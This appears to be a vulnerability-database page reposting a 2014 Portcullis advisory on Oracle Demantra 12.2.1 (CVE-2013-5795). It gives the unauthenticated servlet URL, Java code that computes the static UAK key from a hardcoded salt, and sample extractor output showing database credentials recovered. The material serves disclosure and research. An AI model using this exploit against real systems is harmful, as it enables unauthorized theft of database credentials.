Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle Demantra 12.2.1 - Database Credentials Disclosure

🗓️ 01 Mar 2014 00:00:00Reported by PortcullisType 
zdt
 zdt🔗 0day.today👁 58 Views

Oracle Demantra 12.2.1 Database Credentials Disclosure Exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2013-5795
1 Mar 201400:00
circl
CVE		CVE-2013-5795
15 Jan 201400:30
cve
Cvelist		CVE-2013-5795
15 Jan 201400:30
cvelist
Metasploit		Oracle Demantra Database Credentials Leak
7 Apr 201418:42
metasploit
NVD		CVE-2013-5795
15 Jan 201416:11
nvd
Oracle		Oracle Critical Patch Update - January 2014
14 Jan 201400:00
oracle
Oracle		Oracle Critical Patch Update - January 2014
14 Jan 201400:00
oracle
Packet Storm		Oracle Demantra 12.2.1 Database Credential Leak
2 Mar 201400:00
packetstorm
Packet Storm		Oracle Demantra Database Credentials Leak
1 Sep 202400:00
packetstorm
Prion		Buffer overflow
15 Jan 201416:11
prion
Rows per page
Details:
 
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:
 
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:
 
The target URL is:
 
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
 
Now the UAK key is calculated statically:
 
  String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
 
      StringBuffer tmp = new StringBuffer("sge");
      tmp.append(0);
      tmp.append(encryptedPassword);
 
      uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
 
From that information it is possible to create a simple extractor:
 
pixel:demantra user$ java getUAK
-=[Oracle Demantra Database Details Retriever ]=-
 
[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
[+] Retrieved the following encrypted string:
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Decrypted string is:
TEST?test?demantra?orc?1
 
Together with the authentication bypass this can be exploited unauthenticated as well.

#  0day.today [2018-04-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Mar 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.75952
oracledemantradatabasecredentialsdisclosureremote attackerexploit
58